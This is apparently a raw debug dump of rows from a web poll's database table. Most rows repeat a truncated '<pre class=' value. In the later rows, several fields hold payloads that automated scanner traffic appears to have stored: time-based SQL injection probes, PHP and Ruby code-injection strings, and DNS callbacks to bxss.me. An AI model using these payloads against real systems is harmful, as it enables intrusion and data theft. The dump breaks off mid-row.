(int) 1018 => array(
'id' => '1561',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1019 => array(
'id' => '1562',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1020 => array(
'id' => '1563',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1021 => array(
'id' => '1564',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1022 => array(
'id' => '1565',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1023 => array(
'id' => '1566',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1024 => array(
'id' => '1567',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1025 => array(
'id' => '1568',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1026 => array(
'id' => '1569',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1027 => array(
'id' => '1570',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1028 => array(
'id' => '1571',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1029 => array(
'id' => '1572',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1030 => array(
'id' => '1573',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1031 => array(
'id' => '1574',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1032 => array(
'id' => '1575',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1033 => array(
'id' => '1576',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1034 => array(
'id' => '1577',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1035 => array(
'id' => '1578',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1036 => array(
'id' => '1579',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1037 => array(
'id' => '1580',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1038 => array(
'id' => '1581',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1039 => array(
'id' => '1582',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1040 => array(
'id' => '1583',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1041 => array(
'id' => '1584',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1042 => array(
'id' => '1585',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1043 => array(
'id' => '1586',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1044 => array(
'id' => '1587',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1045 => array(
'id' => '1588',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1046 => array(
'id' => '1589',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1047 => array(
'id' => '1590',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1048 => array(
'id' => '1591',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1049 => array(
'id' => '1592',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1050 => array(
'id' => '1593',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1051 => array(
'id' => '1594',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1052 => array(
'id' => '1595',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1053 => array(
'id' => '1596',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1054 => array(
'id' => '1597',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1055 => array(
'id' => '1598',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1056 => array(
'id' => '1599',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1057 => array(
'id' => '1600',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1058 => array(
'id' => '1601',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1059 => array(
'id' => '1602',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1060 => array(
'id' => '1603',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1061 => array(
'id' => '1604',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1062 => array(
'id' => '1605',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1063 => array(
'id' => '1606',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1064 => array(
'id' => '1607',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1065 => array(
'id' => '1608',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1066 => array(
'id' => '1609',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1067 => array(
'id' => '1610',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1068 => array(
'id' => '1611',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1069 => array(
'id' => '1612',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1070 => array(
'id' => '1613',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1071 => array(
'id' => '1614',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1072 => array(
'id' => '1615',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1073 => array(
'id' => '1616',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1074 => array(
'id' => '1617',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1075 => array(
'id' => '1618',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1076 => array(
'id' => '1619',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1077 => array(
'id' => '1620',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1078 => array(
'id' => '1621',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1079 => array(
'id' => '1622',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1080 => array(
'id' => '1623',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1081 => array(
'id' => '1624',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1082 => array(
'id' => '1625',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1083 => array(
'id' => '1626',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1084 => array(
'id' => '1627',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1085 => array(
'id' => '1628',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1086 => array(
'id' => '1629',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1087 => array(
'id' => '1630',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1088 => array(
'id' => '1631',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1089 => array(
'id' => '1632',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1090 => array(
'id' => '1633',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1091 => array(
'id' => '1634',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1092 => array(
'id' => '1635',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1093 => array(
'id' => '1636',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1094 => array(
'id' => '1637',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1095 => array(
'id' => '1638',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1096 => array(
'id' => '1639',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1097 => array(
'id' => '1640',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1098 => array(
'id' => '1641',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1099 => array(
'id' => '1642',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1100 => array(
'id' => '1643',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1101 => array(
'id' => '1644',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1102 => array(
'id' => '1645',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1103 => array(
'id' => '1646',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1104 => array(
'id' => '1647',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1105 => array(
'id' => '1648',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1106 => array(
'id' => '1649',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1107 => array(
'id' => '1650',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1108 => array(
'id' => '1651',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1109 => array(
'id' => '1652',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1110 => array(
'id' => '1653',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1111 => array(
'id' => '1654',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1112 => array(
'id' => '1655',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1113 => array(
'id' => '1656',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1114 => array(
'id' => '1657',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1115 => array(
'id' => '1658',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1116 => array(
'id' => '1659',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1117 => array(
'id' => '1660',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1118 => array(
'id' => '1661',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1119 => array(
'id' => '1662',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1120 => array(
'id' => '1663',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1121 => array(
'id' => '1664',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1122 => array(
'id' => '1665',
'ip' => '45.84.137.43',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 1123 => array(
'id' => '1666',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1124 => array(
'id' => '1667',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1125 => array(
'id' => '1668',
'ip' => '45.84.137.43',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 1126 => array(
'id' => '1669',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1127 => array(
'id' => '1670',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1128 => array(
'id' => '1671',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1129 => array(
'id' => '1672',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1130 => array(
'id' => '1673',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1131 => array(
'id' => '1674',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1132 => array(
'id' => '1675',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1133 => array(
'id' => '1676',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1134 => array(
'id' => '1677',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1135 => array(
'id' => '1678',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1136 => array(
'id' => '1679',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1137 => array(
'id' => '1680',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1138 => array(
'id' => '1681',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1139 => array(
'id' => '1682',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1140 => array(
'id' => '1683',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1141 => array(
'id' => '1684',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1142 => array(
'id' => '1685',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1143 => array(
'id' => '1686',
'ip' => '45.84.137.43'"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1144 => array(
'id' => '1687',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1145 => array(
'id' => '1688',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1146 => array(
'id' => '1689',
'ip' => '@@6KK95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1147 => array(
'id' => '1690',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1148 => array(
'id' => '1691',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1149 => array(
'id' => '1692',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1150 => array(
'id' => '1693',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1151 => array(
'id' => '1694',
'ip' => '45.84.137.43',
'ip1' => '-1 OR 2+505-505-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 1152 => array(
'id' => '1695',
'ip' => '45.84.137.43',
'ip1' => '-1 OR 2+148-148-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 1153 => array(
'id' => '1696',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1154 => array(
'id' => '1697',
'ip' => '45.84.137.43',
'ip1' => '-1' OR 2+610-610-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 1155 => array(
'id' => '1698',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1156 => array(
'id' => '1699',
'ip' => '45.84.137.43',
'ip1' => '-1' OR 2+53-53-1=0+0+0+1 or 'judwAvMx'='',
'sondage_id' => '2'
),
(int) 1157 => array(
'id' => '1700',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1158 => array(
'id' => '1701',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1159 => array(
'id' => '1702',
'ip' => '45.84.137.43',
'ip1' => '-1" OR 2+257-257-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 1160 => array(
'id' => '1703',
'ip' => '45.84.137.43',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 1161 => array(
'id' => '1704',
'ip' => '45.84.137.43',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(111).concat(90).concat(104).concat(68)+(require"socket"
Socket.gethostbyname("hitmw"+"gitzllpaa9c81.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 1162 => array(
'id' => '1705',
'ip' => '45.84.137.43',
'ip1' => ''.gethostbyname(lc('hitpc'.'illhhsssabdaf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(71).chr(116).chr(68).'',
'sondage_id' => '2'
),
(int) 1163 => array(
'id' => '1706',
'ip' => '45.84.137.43',
'ip1' => '".gethostbyname(lc("hitjx"."srlgmtrs74e0e.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(72).chr(98).chr(75)."',
'sondage_id' => '2'
),
(int) 1164 => array(
'id' => '1707',
'ip' => '45.84.137.43',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(108).concat(75)+(require'socket'
Socket.gethostbyname('hityw'+'duwcslkb56c75.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 1165 => array(
'id' => '1708',
'ip' => '45.84.137.43',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(118).concat(68).concat(119).concat(68)+(require'socket'
Socket.gethostbyname('hitbn'+'ckjgiyfh6248c.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 1166 => array(
'id' => '1709',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1167 => array(
'id' => '1710',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1168 => array(
'id' => '1711',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1169 => array(
'id' => '1712',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1170 => array(
'id' => '1713',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1171 => array(
'id' => '1714',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1172 => array(
'id' => '1715',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1173 => array(
'id' => '1716',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1174 => array(
'id' => '1717',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1175 => array(
'id' => '1718',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1176 => array(
'id' => '1719',
'ip' => '45.84.137.43',
'ip1' => '<pre class=0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 1177 => array(
'id' => '1720',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1178 => array(
'id' => '1721',
'ip' => '45.84.137.43',
'ip1' => '<pre class=0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 1179 => array(
'id' => '1722',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1180 => array(
'id' => '1723',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1181 => array(
'id' => '1724',
'ip' => '45.84.137.43',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 1182 => array(
'id' => '1725',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1183 => array(
'id' => '1726',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1184 => array(
'id' => '1727',
'ip' => '45.84.137.43',
'ip1' => '<pre class=-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 1185 => array(
'id' => '1728',
'ip' => '45.84.137.43',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 1186 => array(
'id' => '1729',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1187 => array(
'id' => '1730',
'ip' => '45.84.137.43',
'ip1' => 'gethostbyname(lc('hitno'.'rgzvnqzj328d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(67).chr(121).chr(85)',
'sondage_id' => '2'
),
(int) 1188 => array(
'id' => '1731',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1189 => array(
'id' => '1732',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1190 => array(
'id' => '1733',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1191 => array(
'id' => '1734',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1192 => array(
'id' => '1735',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1193 => array(
'id' => '1736',
'ip' => '45.84.137.43',
'ip1' => '<pre class=MJXAApOv'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 1194 => array(
'id' => '1737',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1195 => array(
'id' => '1738',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1196 => array(
'id' => '1739',
'ip' => '45.84.137.43',
'ip1' => '<pre class=gUxyX89x' OR 294=(SELECT 294 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 1197 => array(
'id' => '1740',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1198 => array(
'id' => '1741',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1199 => array(
'id' => '1742',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1200 => array(
'id' => '1743',
'ip' => '45.84.137.43',
'ip1' => '<pre class=COmcmNme') OR 280=(SELECT 280 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 1201 => array(
'id' => '1744',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1202 => array(
'id' => '1745',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1203 => array(
'id' => '1746',
'ip' => '45.84.137.43',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 1204 => array(
'id' => '1747',
'ip' => '45.84.137.43',
'ip1' => '<pre class=4f1UYoLe')) OR 403=(SELECT 403 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 1205 => array(
'id' => '1748',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1206 => array(
'id' => '1749',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1207 => array(
'id' => '1750',
'ip' => '45.84.137.43',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 1208 => array(
'id' => '1751',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1209 => array(
'id' => '1752',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1210 => array(
'id' => '1753',
'ip' => '45.84.137.43',
'ip1' => '<pre class='||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 1211 => array(
'id' => '1754',
'ip' => '45.84.137.43',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 1212 => array(
'id' => '1755',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1213 => array(
'id' => '1756',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1214 => array(
'id' => '1757',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1215 => array(
'id' => '1758',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1216 => array(
'id' => '1759',
'ip' => '45.84.137.43',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 1217 => array(
'id' => '1760',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1218 => array(
'id' => '1761',
'ip' => '45.84.137.43',
'ip1' => '<pre class='"',
'sondage_id' => '2'
),
(int) 1219 => array(
'id' => '1762',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1220 => array(
'id' => '1763',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1221 => array(
'id' => '1764',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1222 => array(
'id' => '1765',
'ip' => '45.84.137.43',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 1223 => array(
'id' => '1766',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1224 => array(
'id' => '1767',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1225 => array(
'id' => '1768',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1226 => array(
'id' => '1769',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1227 => array(
'id' => '1770',
'ip' => ''"()',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1228 => array(
'id' => '1771',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1229 => array(
'id' => '1772',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1230 => array(
'id' => '1773',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1231 => array(
'id' => '1774',
'ip' => '45.84.137.43',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 1232 => array(
'id' => '1775',
'ip' => '45.84.137.43',
'ip1' => '@@bcMdp',
'sondage_id' => '2'
),
(int) 1233 => array(
'id' => '1776',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1234 => array(
'id' => '1777',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1235 => array(
'id' => '1778',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1236 => array(
'id' => '1779',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1237 => array(
'id' => '1780',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1238 => array(
'id' => '1781',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1239 => array(
'id' => '1782',
'ip' => '45.84.137.43',
